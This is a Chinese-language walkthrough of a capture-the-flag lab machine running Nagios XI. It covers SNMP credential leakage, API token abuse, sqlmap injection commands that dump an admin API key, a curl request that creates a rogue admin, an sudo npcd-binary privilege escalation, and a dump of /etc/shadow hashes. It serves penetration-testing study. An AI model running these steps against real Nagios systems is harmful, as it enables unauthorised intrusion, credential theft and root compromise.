基本信息

端口扫描

22,80,389,443:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
$ nmap -sC -sV 10.10.11.248
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-15 13:14 CST
Nmap scan report for 10.10.11.248
Host is up (0.13s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
|   3072 61:e2:e7:b4:1b:5d:46:dc:3b:2f:91:38:e6:6d:c5:ff (RSA)
|   256 29:73:c5:a5:8d:aa:3f:60:a9:4a:a3:e5:9f:67:5c:93 (ECDSA)
|_  256 6d:7a:f9:eb:8e:45:c2:02:6a:d5:8d:4d:b3:a3:37:6f (ED25519)
80/tcp  open  http     Apache httpd 2.4.56
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Did not follow redirect to https://nagios.monitored.htb/
389/tcp open  ldap     OpenLDAP 2.2.X - 2.3.X
443/tcp open  ssl/http Apache httpd 2.4.56 ((Debian))
|_ssl-date: TLS randomness does not represent time
|_http-title: Nagios XI
| ssl-cert: Subject: commonName=nagios.monitored.htb/organizationName=Monitored/stateOrProvinceName=Dorset/countryName=UK
| Not valid before: 2023-11-11T21:46:55
|_Not valid after:  2297-08-25T21:46:55
|_http-server-header: Apache/2.4.56 (Debian)
| tls-alpn:
|_  http/1.1
Service Info: Host: nagios.monitored.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.70 seconds

这台机器还需要udp扫描,因为snmp:

1
2
3
4
5
6
7
8
9
10
11
12
13
$ sudo nmap -sU --top-ports 100 10.10.11.248
Password:
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-15 13:17 CST
Nmap scan report for nagios.monitored.htb (10.10.11.248)
Host is up (0.13s latency).
Not shown: 96 closed udp ports (port-unreach)
PORT    STATE         SERVICE
68/udp  open|filtered dhcpc
123/udp open          ntp
161/udp open          snmp
162/udp open|filtered snmptrap

Nmap done: 1 IP address (1 host up) scanned in 115.25 seconds

80

需要加hosts:

1
10.10.11.248 nagios.monitored.htb

是Nagios XI:

需要账号密码:

目录扫描

目录扫描可以发现nagios,同样是需要账号密码:

1
2
3
gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt  -t 50 -u https://nagios.monitored.htb/ -k

/nagios               (Status: 401) [Size: 468]

SNMP

snmp在命令行中发现账号密码:

1
2
3
4
snmpwalk -v 1 -c public 10.10.11.248
snmpwalk -v 1 -c public 10.10.11.248 HOST-RESOURCES-MIB::hrSWRunParameters

HOST-RESOURCES-MIB::hrSWRunParameters.579 = STRING: "-c sleep 30; sudo -u svc /bin/bash -c /opt/scripts/check_host.sh svc XjH7VCehowpR1xZB "

nagios

snmp得到的账号密码不能登录nagiosxi,提示被禁用或不存在(实际应该是被禁用)

但可以登录nagios,4.4.13

nagiosxi

搜索可以发现api方式:

可以确认账户只是被禁用,通过api可以得到token:

1
2
3
curl -XPOST -k -L 'http://nagios.monitored.htb/nagiosxi/api/v1/authenticate?pretty=1' -d 'username=svc&password=XjH7VCehowpR1xZB&valid_min=10'

"auth_token": "26f51ccc5e4fe3ee42c893ffb315915289020820",

sql注入

然后搜索可以发现一系列漏洞,其中有个sql注入:

直接使用前一步的token即可,失败就刷新token:

1
2
3
4
sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=26f51ccc5e4fe3ee42c893ffb315915289020820"
sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=26f51ccc5e4fe3ee42c893ffb315915289020820" --dbs
sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=7bc597bc87680251cf5204c2b4066306e8096151" -D nagiosxi --tables
sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=3bfeec8ba0dc27fb40cbfb24f4ca20bc68ebdcb9" -D nagiosxi -T xi_users --dump

dump的数据库中可以发现api key:

1
2
admin@monitored.htb
IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL

admin

之后使用管理员的api key,添加一个新的管理员:

1
curl -XPOST "http://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL&pretty=1" -d "username=miao&password=123456&name=miao&email=miao@miao.com&auth_level=admin"

添加之后,现在我们可以以管理员身份登录nagiosxi

reverse shell

登录后就可以利用其他漏洞了,例如其中的命令注入:

也可以跟更方便的直接新建commands,然后去service里运行这个command:

Configure -> core config manage -> commands

打到nagios shell:

user flag

nagios用户目录,顺便写公钥方便后续操作:

提权信息

当前用户可以sudo 运行一些东西:

service中的npcd不存在:

1
2
nagios@monitored:~$ ls -al /etc/init.d/npcd
ls: cannot access '/etc/init.d/npcd': No such file or directory

根据这个:

我们可以通过允许sudo的manage_services来运行npcd,这会运行他自己的,而我们有写权限:

1
2
nagios@monitored:~$ ls -al /usr/local/nagios/bin/npcd
-rwxr-xr-x 1 nagios nagios 31584 Jan 14 09:50 /usr/local/nagios/bin/npcd

提权 & root flag

所以就是自己修改npcd,然后运行:

1
2
3
4
# 如果npcd正在运行中提示文件busy,直接把原本的重命名即可
/usr/local/nagios/bin/npcd

sudo /usr/local/nagiosxi/scripts/manage_services.sh restart npcd

shadow

1
2
3
root:$y$j9T$LLy.W6CI0K6McgXMKio0i1$1omBVYjsg.8qEzyjkL.3kXtpAMZNc7x9CMwOnrwltJ8:19671:0:99999:7:::
svc:$y$j9T$JKvaJakBax4xU3.kZFe221$D2o.A3O6EXWgKPzpD8Gky7cPbXZ/a9Ey/9/OM1AoE80:19671:0:99999:7:::
nagios:$y$j9T$EnaS672RtIQB0i6zh.ooO/$gkWPA1PKoIQH.ACc6NVntLPY9x55i08J4S6c1Rpvqn.:19671:0:99999:7:::

参考资料